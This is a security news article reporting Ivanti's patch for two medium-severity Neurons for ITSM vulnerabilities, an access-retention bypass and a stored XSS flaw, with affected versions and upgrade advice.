Critical Ivanti Neurons for ITSM Flaws Let Attackers Hijack User Sessions
Key Takeaways Ivanti has released urgent security updates for its Neurons for ITSM (N-ITSM) platform. Two medium-severity vulnerabilities, CVE-2026-4913 and CVE-2026-4914, could enable unauthorized...
Key Takeaways
- Ivanti has released urgent security updates for its Neurons for ITSM (N-ITSM) platform.
- Two medium-severity vulnerabilities, CVE-2026-4913 and CVE-2026-4914, could enable unauthorized access retention and session data theft.
- The flaws affect Ivanti N-ITSM versions prior to 2025.4, impacting both on-premise and cloud deployments.
- On-premise customers must manually upgrade to version 2025.4; cloud environments were patched by Ivanti on December 12, 2025.
- No active exploitation of these vulnerabilities has been observed by Ivanti at the time of disclosure.
Ivanti has issued critical security updates for its on-premise IT service management solution, Ivanti Neurons for ITSM (N-ITSM), addressing two medium-severity vulnerabilities. These flaws could potentially allow authenticated attackers to maintain unauthorized system access or compromise session data belonging to other users.
Table Of Content
The company confirmed that it has no evidence of active exploitation for either vulnerability. Both issues were identified and reported through Ivanti’s responsible disclosure program and have been resolved in the recently released version 2025.4.
CVE-2026-4913: Improper Path Protection Allows Persistent Access
The first vulnerability, identified as CVE-2026-4913, carries a CVSS score of 5.7 (Medium) and falls under the CWE-424 (Protection Mechanism Failure) category. This flaw is rooted in an inadequate protection mechanism concerning an alternate path within Ivanti N-ITSM versions preceding 2025.4.
Exploitation of this vulnerability could enable a remote, authenticated attacker to retain access to the system even after an administrator has disabled their account. This bypass mechanism presents a significant risk, particularly in corporate settings where the immediate revocation of access is a crucial security measure, especially during employee offboarding or in response to insider threats.
The vulnerability is accessible over the network, requires low privileges for exploitation, and necessitates user interaction to be triggered, contributing to its medium severity rating.
CVE-2026-4914: Stored XSS Leads to Cross-Session Data Theft
The second vulnerability, CVE-2026-4914, is a stored cross-site scripting (XSS) flaw with a CVSS score of 5.4 (Medium), categorized under CWE-79. This vulnerability, present in Ivanti N-ITSM versions prior to 2025.4, permits a remote, authenticated attacker to inject malicious scripts. These scripts would then execute within the browser sessions of other users.
Successful exploitation could allow an attacker to harvest limited information from other user sessions, potentially including session tokens, credentials, or other sensitive ITSM data. The attack requires user interaction, meaning a victim must interact with the specially crafted malicious content for the exploit to succeed. The vulnerability’s cross-scope impact (S:C in the CVSS vector) indicates that its effects are not confined to the immediate session and can extend more broadly.
Both vulnerabilities impact Ivanti Neurons for ITSM version 2025.3 and all previous releases, affecting both on-premise and cloud-based deployments.
- On-premise customers are required to manually upgrade their installations to version 2025.4, which is available via the Ivanti License System (ILS).
- Cloud customers are not required to take any action, as Ivanti automatically applied the necessary fixes to all cloud environments on December 12, 2025.
Ivanti strongly advises all on-premise customers to implement the 2025.4 update without delay. Currently, there are no known indicators of compromise, as no public exploitation has been observed.
Organizations operating older versions of Ivanti Neurons for ITSM should prioritize this upgrade, especially considering the significant access-retention risk posed by CVE-2026-4913 in environments that enforce stringent access control policies.
What You Should Do
- On-Premise Customers: Immediately upgrade your Ivanti Neurons for ITSM deployment to version 2025.4. Obtain the update through the Ivanti License System (ILS).
- Cloud Customers: No action is required. Ivanti has already applied the necessary patches to all cloud environments.
- Review Access Policies: Regularly audit user accounts and access privileges, ensuring that disabled accounts are truly inaccessible.
- Educate Users: Remind users about the risks of interacting with suspicious or unexpected content, especially within IT service management platforms, to mitigate XSS risks.
- Monitor for Anomalies: While no active exploitation is known, maintain vigilance for any unusual activity or unauthorized access attempts within your ITSM environment.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.